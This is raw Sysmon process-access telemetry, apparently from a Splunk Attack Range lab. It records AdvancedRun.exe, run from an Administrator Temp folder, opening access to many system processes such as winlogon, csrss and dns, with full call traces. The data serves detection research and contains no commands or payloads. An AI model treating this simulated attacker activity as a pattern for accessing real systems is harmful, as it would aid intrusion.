4075343  20:14:45.065  {834264DD-DB10-61EA-8F00-000000002702}  4948  C:\Windows\system32\svchost.exe  ATTACKRANGE\Administrator
4075342  20:14:45.064  {834264DD-DB10-61EA-8E00-000000002702}  4912  C:\Windows\System32\sihost.exe  ATTACKRANGE\Administrator
4075341  20:14:45.064  {834264DD-DB10-61EA-8D00-000000002702}  4820  C:\Windows\System32\RuntimeBroker.exe  ATTACKRANGE\Administrator
4075340  20:14:45.064  {834264DD-DB10-61EA-8C00-000000002702}  4808  C:\Windows\System32\rdpclip.exe  ATTACKRANGE\Administrator
4075339  20:14:45.064  {834264DD-DB07-61EA-8800-000000002702}  4836  C:\Program  (TargetImage and the remaining fields of this record continue past the end of this span)
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075338Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004075336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075335Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075334Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075333Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075332Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075331Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075330Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075329Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.062{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075328Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.061{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075327Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.061{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075326Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.061{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075325Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.061{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075324Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075323Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.060{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\